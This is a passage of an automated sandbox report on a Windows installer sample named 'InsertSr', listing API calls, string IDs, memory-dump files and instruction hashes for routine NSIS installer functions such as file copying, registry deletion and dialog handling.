                                                                            • Exec: command="%s", xrefs: 00402241
                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                            • API String ID: 2014279497-3433828417
                                                                            • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                            • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                            • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                            • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                            • GetMessagePos.USER32 ref: 00404871
                                                                            • ScreenToClient.USER32(?,?), ref: 00404889
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                            • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                            • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                            • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                            • MulDiv.KERNEL32(00010E00,00000064,?), ref: 00403295
                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                            • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                            • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                            • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                            • wsprintfW.USER32 ref: 00404457
                                                                            • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$@rD
                                                                            • API String ID: 3540041739-1813061909
                                                                            • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                            • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                            • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                            • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":
                                                                            • API String ID: 589700163-165019052
                                                                            • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                            • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                            • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                            • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1912718029-0
                                                                            • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                            • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                            • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                            • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                            • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                            • String ID:
                                                                            • API String ID: 3376005127-0
                                                                            • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                            • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                            • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                            • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                            • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                            • String ID:
                                                                            • API String ID: 2568930968-0
                                                                            • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                            • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                            • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                            • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                            APIs
                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                            • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                            • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                            • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                            • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                            • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                            • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                            APIs
                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                            • API String ID: 1697273262-1764544995
                                                                            • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                            • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                            • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                            • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00404902
                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID: $@rD
                                                                            • API String ID: 3748168415-881980237
                                                                            • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                            • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                            • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                            • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                              • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                            • API String ID: 2577523808-3778932970
                                                                            • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                            • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                            • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                            • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatwsprintf
                                                                            • String ID: %02x%c$...
                                                                            • API String ID: 3065427908-1057055748
                                                                            • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                            • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                            • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                            • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405057
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                            • API String ID: 2266616436-4211696005
